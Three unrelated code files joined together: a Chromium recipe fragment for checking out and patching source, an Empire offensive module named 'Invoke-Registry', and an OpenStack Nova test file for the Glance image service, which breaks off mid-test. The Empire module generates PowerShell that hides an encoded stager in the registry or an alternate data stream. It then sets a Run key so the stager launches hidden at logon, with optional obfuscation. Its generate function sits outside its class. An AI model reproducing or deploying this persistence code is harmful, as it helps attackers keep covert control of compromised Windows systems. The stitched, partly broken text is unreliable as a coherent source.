        'missing gclient_config or forgot api.gclient.set_config(...) before?')

    # Construct our bot_update command. This basically be inclusive of
    # everything required for bot_update to know:
    patch_root = patch_root or self.m.gclient.get_gerrit_patch_root(
        gclient_config=cfg)

    # Allow patched project's revision if necessary.
    # This is important for projects which are checked out as DEPS of the
    # gclient solution.
    self.m.gclient.set_patch_repo_revision(cfg)

    reverse_rev_map = self.m.gclient.got_revision_reverse_mapping(cfg)

    flags = [
        # What do we want to check out (spec/root/rev/reverse_rev_map).
        ['--spec-path', self.m.raw_io.input(
            self.m.gclient.config_to_pythonish(cfg))],
        ['--patch_root', patch_root],
        ['--revision_mapping_file', self.m.json.input(reverse_rev_map)],
        ['--git-cache-dir', cfg.cache_dir],
        ['--cleanup-dir', self.m.path['cleanup'].join('bot_update')],

        # Hookups to JSON output back into recipes.
        ['--output_json', self.m.json.output()],
    ]

    # How to find the patch, if any
    if patch:
      repo_url = self.m.tryserver.gerrit_change_repo_url
      fetch_ref = self.m.tryserver.gerrit_change_fetch_ref
      target_ref = self.m.tryserver.gerrit_change_target_ref
      if repo_url and fetch_ref:
        flags.append([
            '--patch_ref',
            '%s@%s:%s' % (repo_url, target_ref, fetch_ref),
        ])
      if patch_refs:
        flags.extend(
            ['--patch_ref', patch_ref]
            for patch_ref in patch_refs)

    # Compute requested revisions.
    revisions = {}
    for solution in cfg.solutions:
      if solution.revision:
        revisions[solution.name] = solution.revision

    # HACK: ensure_checkout API must be redesigned so that we don't pass such
    # parameters. Existing semantics is too opiniated.
    in_commit = self.m.buildbucket.gitiles_commit
    in_commit_rev = in_commit.id or in_commit.ref
    if not ignore_input_commit and in_commit_rev:
      # Note: this is not entirely correct. build.input.gitiles_commit
      # definition says "The Gitiles commit to run against.".
      # However, here we ignore it if the config specified a revision.
      # This is necessary because existing builders rely on this behavior,
      # e.g. they want to force refs/heads/master at the config level.
      in_commit_repo_path = self._get_commit_repo_path(in_commit, cfg)
      revisions[in_commit_repo_path] = (
          revisions.get(in_commit_repo_path) or in_commit_rev)
      parsed_solution_urls = set(
          self.m.gitiles.parse_repo_url(s.url) for s in cfg.solutions)
      if (in_commit.id and in_commit.ref
          and (in_commit.host, in_commit.project) in parsed_solution_urls):
        refs = [in_commit.ref] + refs

    # Guarantee that first solution has a revision.
    # TODO(machenbach): We should explicitly pass HEAD for ALL solutions
    # that don't specify anything else.
    first_sol = cfg.solutions[0].name
    revisions[first_sol] = revisions.get(first_sol) or 'HEAD'

    if cfg.revisions:
      # Only update with non-empty values. Some recipe might otherwise
      # overwrite the HEAD default with an empty string.
      revisions.update(
          (k, v) for k, v in cfg.revisions.items() if v)

    if cfg.solutions and root_solution_revision:
      revisions[first_sol] = root_solution_revision
    # Allow for overrides required to bisect into rolls.
    revisions.update(self._deps_revision_overrides)

    # Compute command-line parameters for requested revisions.
    # Also collect all fixed revisions to simulate them in the json output.
    # Fixed revision are the explicit input revisions of bot_update.py, i.e.
    # every command line parameter "--revision name@value".
    fixed_revisions = {}
    for name, revision in sorted(revisions.items()):
      fixed_revision = self.m.gclient.resolve_revision(revision)
      if fixed_revision:
        fixed_revisions[name] = fixed_revision
        if fixed_revision.upper() == 'HEAD':
          # Sync to correct destination ref if HEAD was specified.
          fixed_revision = self._destination_ref(cfg, name)
        # If we're syncing to a ref, we want to make sure it exists before
        # trying to check it out.
        if (fixed_revision.startswith('refs/') and
            # TODO(crbug.com/874501): fetching additional refs is currently
            # only supported for the root solution. We should investigate
            # supporting it for other dependencies.
            cfg.solutions and
            cfg.solutions[0].name == name):
          # Handle the "ref:revision" syntax, e.g.
          # refs/branch-heads/4.2:deadbeef
          refs.append(fixed_revision.split(':')[0])
        flags.append(['--revision', '%s@%s' % (name, fixed_revision)])

    for ref in refs:
      assert not ref.startswith('refs/remotes/'), (
          'The "refs/remotes/*" syntax is not supported.\n'
          'The "remotes" syntax is dependent on the way the local repo is '
          'configured, and while there are defaults that can often be '
          'assumed, there is no guarantee the mapping will always be done in '
          'a particular way.')

    # Add extra fetch refspecs.
    for ref in refs:
      flags.append(['--refs', ref])

    # Filter out flags that are None.
    cmd = [item for flag_set in flags
           for item in flag_set if flag_set[1] is not None]

    if clobber:
      cmd.append('--clobber')
    if with_branch_heads or cfg.with_branch_heads:
      cmd.append('--with_branch_heads')
    if with_tags or cfg.with_tags:
      cmd.append('--with_tags')
    if gerrit_no_reset:
      cmd.append('--gerrit_no_reset')
    if no_fetch_tags:
      cmd.append('--no_fetch_tags')
    if gerrit_no_rebase_patch_ref:
      cmd.append('--gerrit_no_rebase_patch_ref')
    if disable_syntax_validation or cfg.disable_syntax_validation:
      cmd.append('--disable-syntax-validation')

    # Inject Json output for testing.
    first_sln = cfg.solutions[0].name
    step_test_data = step_test_data or (lambda: self.test_api.output_json(
        patch_root, first_sln, reverse_rev_map, self._fail_patch,
        fixed_revisions=fixed_revisions))

    name = 'bot_update'
    if not patch:
      name += ' (without patch)'
    if suffix:
      name += ' - %s' % suffix

    # Ah hah! Now that everything is in place, lets run bot_update!
    step_result = None
    try:
      # 87 and 88 are the 'patch failure' codes for patch download and patch
      # apply, respectively. We don't actually use the error codes, and instead
      # rely on emitted json to determine cause of failure.
      step_result = self(
          name, cmd, step_test_data=step_test_data,
          ok_ret=(0, 87, 88), **kwargs)
    except self.m.step.StepFailure as f:
      step_result = f.result
      raise
    finally:
      # Post-processing runs even on failure, as long as JSON was emitted.
      if step_result and step_result.json.output:
        result = step_result.json.output
        self._last_returned_properties = result.get('properties', {})

        if update_presentation:
          # Set properties such as got_revision.
          for prop_name, prop_value in (
              self.last_returned_properties.items()):
            step_result.presentation.properties[prop_name] = prop_value
        # Add helpful step description in the step UI.
        if 'step_text' in result:
          step_text = result['step_text']
          step_result.presentation.step_text = step_text

        # Export the step results as a Source Manifest to LogDog.
        source_manifest = result.get('source_manifest', {})
        if manifest_name:
          if not patch:
            # The param "patched" is purely cosmetic to mean "if false, this
            # bot_update run exists purely to unpatch an existing patch".
            manifest_name += '_unpatched'
          self.m.source_manifest.set_json_manifest(
              manifest_name, source_manifest)

        # Set output commit of the build.
        if set_output_commit:
          # As of April 2019, got_revision describes the output commit,
          # the same commit that Build.output.gitiles_commit describes.
          # In particular, users tend to set got_revision to make Milo display
          # it. Derive output commit from got_revision.
          out_commit = common_pb2.GitilesCommit(
              id=self._last_returned_properties['got_revision'],
          )

          out_solution = reverse_rev_map['got_revision']
          out_manifest = result['manifest'][out_solution]
          assert out_manifest['revision'] == out_commit.id, (
              out_manifest, out_commit.id)

          out_commit.host, out_commit.project = (
              self.m.gitiles.parse_repo_url(out_manifest['repository'])
          )

          # Determine the output ref.
          got_revision_cp = self._last_returned_properties.get('got_revision_cp')
          in_rev = revisions.get(out_solution)
          if got_revision_cp:
            # If commit position string is available, read the ref from there.
            out_commit.ref, out_commit.position = (
                self.m.commit_position.parse(got_revision_cp))
          elif in_rev.startswith('refs/'):
            # If we were asked to check out a specific ref, use it as output
            # ref.
            out_commit.ref = in_rev
          elif in_rev == 'HEAD':
            # bot_update.py interprets HEAD as refs/heads/master
            out_commit.ref = 'refs/heads/master'
          elif out_commit.id == in_commit.id and in_commit.ref:
            # Derive output ref from the input ref.
            out_commit.ref = in_commit.ref
          else:  # pragma: no cover
            assert False, (
                'Unsupposed case. '
                'Call buildbucket.set_output_gitiles_commit directly.'
            )
          self.m.buildbucket.set_output_gitiles_commit(out_commit)

        # Set the "checkout" path for the main solution.
        # This is used by the Chromium module to figure out where to look for
        # the checkout.
        # If there is a patch failure, emit another step that said things
        # failed.
        if result.get('patch_failure'):
          return_code = result.get('patch_apply_return_code')
          patch_body = result.get('failed_patch_body')
          try:
            if return_code == 3:
              # This is download failure, hence an infra failure.
              with self.m.context(infra_steps=True):
                self.m.python.failing_step(
                    'Patch failure', 'Git reported a download failure')
            else:
              # This is actual patch failure.
              self.m.tryserver.set_patch_failure_tryjob_result()
              self.m.cq.set_do_not_retry_build()
              self.m.python.failing_step(
                  'Patch failure', 'See attached log. Try rebasing?')
          except self.m.step.StepFailure as e:
            if patch_body:
              e.result.presentation.logs['patch error'] = (
                  patch_body.splitlines())
            raise e

        # bot_update actually just sets root to be the folder name of the
        # first solution.
        if (result.get('did_run')
            and 'checkout' not in self.m.path
            and 'root' in result):
          co_root = result['root']
          cwd = self.m.context.cwd or self.m.path['start_dir']
          self.m.path['checkout'] = cwd.join(*co_root.split(self.m.path.sep))

    return step_result

  def _destination_ref(self, cfg, path):
    """Returns the ref branch of a CL for the matching project if available or
    HEAD otherwise.

    If there's no Gerrit CL associated with the run, returns 'HEAD'.
    Otherwise this queries Gerrit for the correct destination ref, which
    might differ from refs/heads/master.

    Args:
      cfg: The used gclient config.
      path: The DEPS path of the project this prefix is for. E.g. 'src' or
          'src/v8'. The query will only be made for the project that matches
          the CL's project.

    Returns:
      A destination ref as understood by bot_update.py if available
      and if different from refs/heads/master, returns 'HEAD' otherwise.
    """
    # Ignore project paths other than the one belonging to the current CL.
    patch_path = self.m.gclient.get_gerrit_patch_root(gclient_config=cfg)
    if patch_path:
      patch_path = patch_path.replace(self.m.path.sep, '/')
    if not patch_path or path != patch_path:
      return 'HEAD'

    target_ref = self.m.tryserver.gerrit_change_target_ref
    if target_ref == 'refs/heads/master':
      return 'HEAD'

    return target_ref

  def resolve_fixed_revision(self, bot_update_json, name):
    """Set a fixed revision for a single dependency using project revision
    properties.
    """
    rev_properties = self.get_project_revision_properties(name)
    self.m.gclient.c.revisions = {
        name: bot_update_json['properties'][rev_properties[0]]
    }

  def _resolve_fixed_revisions(self, bot_update_json):
    """Set all fixed revisions from the first sync to their respective
    got_X_revision values.

    If on the first sync, a revision was requested to be HEAD, this avoids
    using HEAD potentially resolving to a different revision on the second
    sync. Instead, we sync explicitly to whatever was checked out the first
    time.

    Example (chromium trybot used with v8 patch):

    First sync was called with
    bot_update.py --revision src@abc --revision src/v8@HEAD
    Fixed revisions are: src, src/v8
    Got_revision_mapping: src->got_revision, src/v8->got_v8_revision
    got_revision = abc, got_v8_revision = deadbeef
    Second sync will be called with
    bot_update.py --revision src@abc --revision src/v8@deadbeef

    Example (chromium trybot used with chromium DEPS change, changing v8 from
    "v8_before" to "v8_after"):

    First sync was called with
    bot_update.py --revision src@abc
    Fixed revisions are: src
    Got_revision_mapping: src->got_revision, src/v8->got_v8_revision
    got_revision = abc, got_v8_revision = v8_after
    Second sync will be called with
    bot_update.py --revision src@abc
    When deapplying the patch, v8 will be synced to v8_before.
    """
    for name in bot_update_json.get('fixed_revisions', {}):
      rev_properties = self.get_project_revision_properties(name)
      if (rev_properties and
          bot_update_json['properties'].get(rev_properties[0])):
        self.m.gclient.c.revisions[name] = str(
            bot_update_json['properties'][rev_properties[0]])

  # TODO(machenbach): Replace usages of this method eventually by direct calls
  # to the manifest output.
  def get_project_revision_properties(self, project_name, gclient_config=None):
    """Returns all property names used for storing the checked-out revision of
    a given project.

    Args:
      project_name (str): The name of a checked-out project as deps path, e.g.
          src or src/v8.
      gclient_config: The gclient configuration to use. If omitted, the current
          gclient configuration is used.

    Returns (list of str): All properties that'll hold the checked-out revision
        of the given project. An empty list if no such properties exist.
    """
    cfg = gclient_config or self.m.gclient.c
    # Sort for determinism. We might have several properties for the same
    # project, e.g. got_revision and got_webrtc_revision.
    rev_reverse_map = self.m.gclient.got_revision_reverse_mapping(cfg)
    return sorted(
        prop
        for prop, project in rev_reverse_map.items()
        if project == project_name
    )

  def deapply_patch(self, bot_update_step):
    """Deapplies a patch, taking care of DEPS and solution revisions properly.
    """
    bot_update_json = bot_update_step.json.output
    # We only override first solution here to make sure that we correctly revert
    # changes to DEPS file, which is particularly important for auto-rolls. It
    # is also imporant that we do not assume that corresponding revision is
    # stored in the 'got_revision' as some gclient configs change the default
    # mapping for their own purposes.
    first_solution_name = self.m.gclient.c.solutions[0].name
    rev_property = self.get_project_revision_properties(first_solution_name)[0]
    self.m.gclient.c.revisions[first_solution_name] = str(
        bot_update_json['properties'][rev_property])
    self._resolve_fixed_revisions(bot_update_json)

    self.ensure_checkout(
        patch=False, no_fetch_tags=True, update_presentation=False)
|
|
import os
from lib.common import helpers
class Module:
    def __init__(self, mainMenu, params=[]):
        # Static metadata describing this module to the framework.
        # NOTE(review): params=[] is a mutable default argument; harmless here
        # because it is only iterated, never mutated.
        self.info = {
            'Name': 'Invoke-Registry',

            'Author': ['@mattifestation', '@harmj0y'],

            'Description': ('Persist a stager (or script) via the HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run '
                            'registry key. This has an easy detection/removal rating.'),

            'Background' : False,

            'OutputExtension' : None,

            'NeedsAdmin' : True,

            'OpsecSafe' : False,

            'Language' : 'powershell',

            'MinLanguageVersion' : '2',

            'Comments': [
                'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
            ]
        }

        # any options needed by the module, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Agent' : {
                'Description'   :   'Agent to run module on.',
                'Required'      :   True,
                'Value'         :   ''
            },
            'Listener' : {
                'Description'   :   'Listener to use.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'KeyName' : {
                'Description'   :   'Key name for the run trigger.',
                'Required'      :   True,
                'Value'         :   'Updater'
            },
            'RegPath' : {
                'Description'   :   'Registry location to store the script code. Last element is the key name.',
                'Required'      :   False,
                'Value'         :   'HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug'
            },
            'ADSPath' : {
                'Description'   :   'Alternate-data-stream location to store the script code.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'ExtFile' : {
                'Description'   :   'Use an external file for the payload instead of a stager.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'Cleanup' : {
                'Description'   :   'Switch. Cleanup the trigger and any script from specified location.',
                'Required'      :   False,
                'Value'         :   ''
            },
            'UserAgent' : {
                'Description'   :   'User-agent string to use for the staging request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'Proxy' : {
                'Description'   :   'Proxy to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            },
            'ProxyCreds' : {
                'Description'   :   'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
                'Required'      :   False,
                'Value'         :   'default'
            }
        }

        # save off a copy of the mainMenu object to access external functionality
        #   like listeners/agent handlers/etc.
        self.mainMenu = mainMenu

        # Apply any [Name, Value] pairs passed in over the option defaults.
        for param in params:
            # parameter format is [Name, Value]
            option, value = param
            if option in self.options:
                self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
    """Build the PowerShell one-liner that installs (or removes) registry
    run-key persistence.

    The encoded payload is stored either in an alternate data stream
    (``ADSPath``) or in a registry value (``RegPath``); a ``HKLM:...\\Run``
    entry named ``KeyName`` is written to decode and launch it at logon.
    With ``Cleanup`` set to 'true' a removal script is returned instead.
    Returns the PowerShell script as a string, or "" on validation failure.
    """
    listenerName = self.options['Listener']['Value']
    # trigger options
    keyName = self.options['KeyName']['Value']
    # storage options
    regPath = self.options['RegPath']['Value']
    adsPath = self.options['ADSPath']['Value']
    # management options
    extFile = self.options['ExtFile']['Value']
    cleanup = self.options['Cleanup']['Value']
    # staging options
    userAgent = self.options['UserAgent']['Value']
    proxy = self.options['Proxy']['Value']
    proxyCreds = self.options['ProxyCreds']['Value']
    statusMsg = ""
    locationString = ""
    # for cleanup, remove any script from the specified storage location
    # and remove the specified trigger
    if cleanup.lower() == 'true':
        if adsPath != '':
            # remove the ADS storage location
            if ".txt" not in adsPath:
                # ADS removal below requires a file-backed stream name
                print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
                return ""
            # overwrite the stream with a single byte ("echo x") to wipe it
            script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
        else:
            # remove the script stored in the registry at the specified reg path
            # NOTE(review): path/name computed here are unused — the PS script
            # below recomputes them from $RegPath itself.
            path = "\\".join(regPath.split("\\")[0:-1])
            name = regPath.split("\\")[-1]
            script = "$RegPath = '"+regPath+"';"
            script += "$parts = $RegPath.split('\\');"
            script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
            script += "$name = $parts[-1];"
            script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
            script += "Remove-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+";"
            script += "'Registry persistence removed.'"
        return script
    if extFile != '':
        # read in an external file as the payload and build a
        # base64 encoded version as encScript
        if os.path.exists(extFile):
            f = open(extFile, 'r')
            fileData = f.read()
            f.close()
            # unicode-base64 encode the script for -enc launching
            encScript = helpers.enc_powershell(fileData)
            statusMsg += "using external file " + extFile
        else:
            print helpers.color("[!] File does not exist: " + extFile)
            return ""
    else:
        # if an external file isn't specified, use a listener
        if not self.mainMenu.listeners.is_listener_valid(listenerName):
            # not a valid listener, return nothing for the script
            print helpers.color("[!] Invalid listener: " + listenerName)
            return ""
        else:
            # generate the PowerShell one-liner with all of the proper options set
            launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
            # the launcher is "powershell ... -enc <b64>"; keep only the blob
            encScript = launcher.split(" ")[-1]
            statusMsg += "using listener " + listenerName
    # store the script in the specified alternate data stream location
    if adsPath != '':
        if ".txt" not in adsPath:
            print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
            return ""
        script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
        # read the payload back out of the stream at trigger time
        locationString = "$(cmd /c \''more < "+adsPath+"\'')"
    else:
        # otherwise store the script into the specified registry location
        path = "\\".join(regPath.split("\\")[0:-1])
        name = regPath.split("\\")[-1]
        statusMsg += " stored in " + regPath + "."
        script = "$RegPath = '"+regPath+"';"
        script += "$parts = $RegPath.split('\\');"
        script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
        script += "$name = $parts[-1];"
        script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
        # note where the script is stored
        locationString = "$((gp "+path+" "+name+")."+name+")"
    # write the Run-key trigger that decodes and launches the stored payload
    script += "$null=Set-ItemProperty -Force -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\Run\\ -Name "+keyName+" -Value '\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c \"$x="+locationString+";powershell -Win Hidden -enc $x\"';"
    script += "'Registry persistence established "+statusMsg+"'"
    if obfuscate:
        script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
    return script
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import random
import time
import glanceclient.exc
from nova import context
from nova import exception
from nova.image import glance
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests.glance import stubs as glance_stubs
class NullWriter(object):
    """Writer stub used to test ImageService.get, which takes a writer object.

    ``write`` accepts anything and silently discards it.
    """

    def write(self, *args, **kwargs):
        # Intentionally a no-op: the tests only need a writer-shaped object.
        pass
class TestGlanceSerializer(test.TestCase):
    """Round-trip test for the glance metadata (de)serialization helpers."""
    def test_serialize(self):
        # 'mappings' and 'block_device_mapping' are complex properties that
        # glance stores as JSON strings; everything else passes through.
        metadata = {'name': 'image1',
                    'is_public': True,
                    'foo': 'bar',
                    'properties': {
                        'prop1': 'propvalue1',
                        'mappings': [
                            {'virtual': 'aaa',
                             'device': 'bbb'},
                            {'virtual': 'xxx',
                             'device': 'yyy'}],
                        'block_device_mapping': [
                            {'virtual_device': 'fake',
                             'device_name': '/dev/fake'},
                            {'virtual_device': 'ephemeral0',
                             'device_name': '/dev/fake0'}]}}
        # Expected output: the two complex properties JSON-encoded in place.
        converted_expected = {
            'name': 'image1',
            'is_public': True,
            'foo': 'bar',
            'properties': {
                'prop1': 'propvalue1',
                'mappings':
                '[{"device": "bbb", "virtual": "aaa"}, '
                '{"device": "yyy", "virtual": "xxx"}]',
                'block_device_mapping':
                '[{"virtual_device": "fake", "device_name": "/dev/fake"}, '
                '{"virtual_device": "ephemeral0", '
                '"device_name": "/dev/fake0"}]'}}
        converted = glance._convert_to_string(metadata)
        self.assertEqual(converted, converted_expected)
        # Deserializing must restore the original structure exactly.
        self.assertEqual(glance._convert_from_string(converted), metadata)
class TestGlanceImageService(test.TestCase):
    """
    Tests the Glance image service.
    At a high level, the translations involved are:
    1. Glance -> ImageService - This is needed so we can support
    multple ImageServices (Glance, Local, etc)
    2. ImageService -> API - This is needed so we can support multple
    APIs (OpenStack, EC2)
    """
    # Glance timestamp wire formats (old format lacks microseconds).
    NOW_GLANCE_OLD_FORMAT = "2010-10-11T10:30:22"
    NOW_GLANCE_FORMAT = "2010-10-11T10:30:22.000000"

    class tzinfo(datetime.tzinfo):
        # Minimal UTC tzinfo so NOW_DATETIME is timezone-aware.
        @staticmethod
        def utcoffset(*args, **kwargs):
            return datetime.timedelta()

    # Aware datetime matching the NOW_GLANCE_* strings above.
    NOW_DATETIME = datetime.datetime(2010, 10, 11, 10, 30, 22, tzinfo=tzinfo())

    def setUp(self):
        """Wire a StubGlanceClient into a fresh GlanceImageService."""
        super(TestGlanceImageService, self).setUp()
        fakes.stub_out_compute_api_snapshot(self.stubs)
        client = glance_stubs.StubGlanceClient()
        self.service = self._create_image_service(client)
        self.context = context.RequestContext('fake', 'fake', auth_token=True)

    def _create_image_service(self, client):
        """Return a GlanceImageService whose wrapper always yields `client`."""
        def _fake_create_glance_client(context, host, port, use_ssl, version):
            return client
        self.stubs.Set(glance, '_create_glance_client',
                _fake_create_glance_client)
        client_wrapper = glance.GlanceClientWrapper(
                'fake', 'fake_host', 9292)
        return glance.GlanceImageService(client=client_wrapper)

    @staticmethod
    def _make_fixture(**kwargs):
        # Base image fixture; keyword args override/extend the defaults.
        fixture = {'name': None,
                   'properties': {},
                   'status': None,
                   'is_public': None}
        fixture.update(kwargs)
        return fixture

    def _make_datetime_fixture(self):
        # Fixture whose timestamps use the glance wire format.
        return self._make_fixture(created_at=self.NOW_GLANCE_FORMAT,
                                  updated_at=self.NOW_GLANCE_FORMAT,
                                  deleted_at=self.NOW_GLANCE_FORMAT)

    def test_create_with_instance_id(self):
        """Ensure instance_id is persisted as an image-property"""
        fixture = {'name': 'test image',
                   'is_public': False,
                   'properties': {'instance_id': '42', 'user_id': 'fake'}}
        image_id = self.service.create(self.context, fixture)['id']
        image_meta = self.service.show(self.context, image_id)
        expected = {
            'id': image_id,
            'name': 'test image',
            'is_public': False,
            'size': None,
            'min_disk': None,
            'min_ram': None,
            'disk_format': None,
            'container_format': None,
            'checksum': None,
            'created_at': self.NOW_DATETIME,
            'updated_at': self.NOW_DATETIME,
            'deleted_at': None,
            'deleted': None,
            'status': None,
            'properties': {'instance_id': '42', 'user_id': 'fake'},
            'owner': None,
        }
        self.assertDictMatch(image_meta, expected)
        # detail() must return the same translated metadata as show().
        image_metas = self.service.detail(self.context)
        self.assertDictMatch(image_metas[0], expected)

    def test_create_without_instance_id(self):
        """
        Ensure we can create an image without having to specify an
        instance_id. Public images are an example of an image not tied to an
        instance.
        """
        fixture = {'name': 'test image', 'is_public': False}
        image_id = self.service.create(self.context, fixture)['id']
        expected = {
            'id': image_id,
            'name': 'test image',
            'is_public': False,
            'size': None,
            'min_disk': None,
            'min_ram': None,
            'disk_format': None,
            'container_format': None,
            'checksum': None,
            'created_at': self.NOW_DATETIME,
            'updated_at': self.NOW_DATETIME,
            'deleted_at': None,
            'deleted': None,
            'status': None,
            'properties': {},
            'owner': None,
        }
        actual = self.service.show(self.context, image_id)
        self.assertDictMatch(actual, expected)

    def test_create(self):
        # create() returns an id and grows the image list by one.
        fixture = self._make_fixture(name='test image')
        num_images = len(self.service.detail(self.context))
        image_id = self.service.create(self.context, fixture)['id']
        self.assertNotEquals(None, image_id)
        self.assertEquals(num_images + 1,
                          len(self.service.detail(self.context)))

    def test_create_and_show_non_existing_image(self):
        # show() on an unknown id raises ImageNotFound.
        fixture = self._make_fixture(name='test image')
        image_id = self.service.create(self.context, fixture)['id']
        self.assertNotEquals(None, image_id)
        self.assertRaises(exception.ImageNotFound,
                          self.service.show,
                          self.context,
                          'bad image id')

    def test_detail_private_image(self):
        # A private image is visible to the owning project via detail().
        fixture = self._make_fixture(name='test image')
        fixture['is_public'] = False
        properties = {'owner_id': 'proj1'}
        fixture['properties'] = properties
        self.service.create(self.context, fixture)['id']
        proj = self.context.project_id
        self.context.project_id = 'proj1'
        image_metas = self.service.detail(self.context)
        self.context.project_id = proj
        self.assertEqual(1, len(image_metas))
        self.assertEqual(image_metas[0]['name'], 'test image')
        self.assertEqual(image_metas[0]['is_public'], False)

    def test_detail_marker(self):
        # With marker=ids[1], detail() returns the 8 images after it, in order.
        fixtures = []
        ids = []
        for i in range(10):
            fixture = self._make_fixture(name='TestImage %d' % (i))
            fixtures.append(fixture)
            ids.append(self.service.create(self.context, fixture)['id'])
        image_metas = self.service.detail(self.context, marker=ids[1])
        self.assertEquals(len(image_metas), 8)
        i = 2
        for meta in image_metas:
            expected = {
                'id': ids[i],
                'status': None,
                'is_public': None,
                'name': 'TestImage %d' % (i),
                'properties': {},
                'size': None,
                'min_disk': None,
                'min_ram': None,
                'disk_format': None,
                'container_format': None,
                'checksum': None,
                'created_at': self.NOW_DATETIME,
                'updated_at': self.NOW_DATETIME,
                'deleted_at': None,
                'deleted': None,
                'owner': None,
            }
            self.assertDictMatch(meta, expected)
            i = i + 1

    def test_detail_limit(self):
        # limit=5 caps the number of results.
        fixtures = []
        ids = []
        for i in range(10):
            fixture = self._make_fixture(name='TestImage %d' % (i))
            fixtures.append(fixture)
            ids.append(self.service.create(self.context, fixture)['id'])
        image_metas = self.service.detail(self.context, limit=5)
        self.assertEquals(len(image_metas), 5)

    def test_detail_default_limit(self):
        # Without a limit, all images come back in creation order.
        fixtures = []
        ids = []
        for i in range(10):
            fixture = self._make_fixture(name='TestImage %d' % (i))
            fixtures.append(fixture)
            ids.append(self.service.create(self.context, fixture)['id'])
        image_metas = self.service.detail(self.context)
        for i, meta in enumerate(image_metas):
            self.assertEqual(meta['name'], 'TestImage %d' % (i))

    def test_detail_marker_and_limit(self):
        # marker and limit compose: 5 images starting after ids[3].
        fixtures = []
        ids = []
        for i in range(10):
            fixture = self._make_fixture(name='TestImage %d' % (i))
            fixtures.append(fixture)
            ids.append(self.service.create(self.context, fixture)['id'])
        image_metas = self.service.detail(self.context, marker=ids[3], limit=5)
        self.assertEquals(len(image_metas), 5)
        i = 4
        for meta in image_metas:
            expected = {
                'id': ids[i],
                'status': None,
                'is_public': None,
                'name': 'TestImage %d' % (i),
                'properties': {},
                'size': None,
                'min_disk': None,
                'min_ram': None,
                'disk_format': None,
                'container_format': None,
                'checksum': None,
                'created_at': self.NOW_DATETIME,
                'updated_at': self.NOW_DATETIME,
                'deleted_at': None,
                'deleted': None,
                'owner': None,
            }
            self.assertDictMatch(meta, expected)
            i = i + 1

    def test_detail_invalid_marker(self):
        # An unknown marker raises exception.Invalid.
        fixtures = []
        ids = []
        for i in range(10):
            fixture = self._make_fixture(name='TestImage %d' % (i))
            fixtures.append(fixture)
            ids.append(self.service.create(self.context, fixture)['id'])
        self.assertRaises(exception.Invalid, self.service.detail,
                          self.context, marker='invalidmarker')

    def test_update(self):
        fixture = self._make_fixture(name='test image')
        image = self.service.create(self.context, fixture)
        # XXX(review): leftover debug print — consider removing.
        print image
        image_id = image['id']
        fixture['name'] = 'new image name'
        self.service.update(self.context, image_id, fixture)
        new_image_data = self.service.show(self.context, image_id)
        self.assertEquals('new image name', new_image_data['name'])

    def test_delete(self):
        # delete() removes exactly one image from the listing.
        fixture1 = self._make_fixture(name='test image 1')
        fixture2 = self._make_fixture(name='test image 2')
        fixtures = [fixture1, fixture2]
        num_images = len(self.service.detail(self.context))
        self.assertEquals(0, num_images)
        ids = []
        for fixture in fixtures:
            new_id = self.service.create(self.context, fixture)['id']
            ids.append(new_id)
        num_images = len(self.service.detail(self.context))
        self.assertEquals(2, num_images)
        self.service.delete(self.context, ids[0])
        num_images = len(self.service.detail(self.context))
        self.assertEquals(1, num_images)

    def test_show_passes_through_to_client(self):
        fixture = self._make_fixture(name='image1', is_public=True)
        image_id = self.service.create(self.context, fixture)['id']
        image_meta = self.service.show(self.context, image_id)
        expected = {
            'id': image_id,
            'name': 'image1',
            'is_public': True,
            'size': None,
            'min_disk': None,
            'min_ram': None,
            'disk_format': None,
            'container_format': None,
            'checksum': None,
            'created_at': self.NOW_DATETIME,
            'updated_at': self.NOW_DATETIME,
            'deleted_at': None,
            'deleted': None,
            'status': None,
            'properties': {},
            'owner': None,
        }
        self.assertEqual(image_meta, expected)

    def test_show_raises_when_no_authtoken_in_the_context(self):
        # Without an auth token, a private image is treated as not found.
        fixture = self._make_fixture(name='image1',
                                     is_public=False,
                                     properties={'one': 'two'})
        image_id = self.service.create(self.context, fixture)['id']
        self.context.auth_token = False
        self.assertRaises(exception.ImageNotFound,
                          self.service.show,
                          self.context,
                          image_id)

    def test_detail_passes_through_to_client(self):
        fixture = self._make_fixture(name='image10', is_public=True)
        image_id = self.service.create(self.context, fixture)['id']
        image_metas = self.service.detail(self.context)
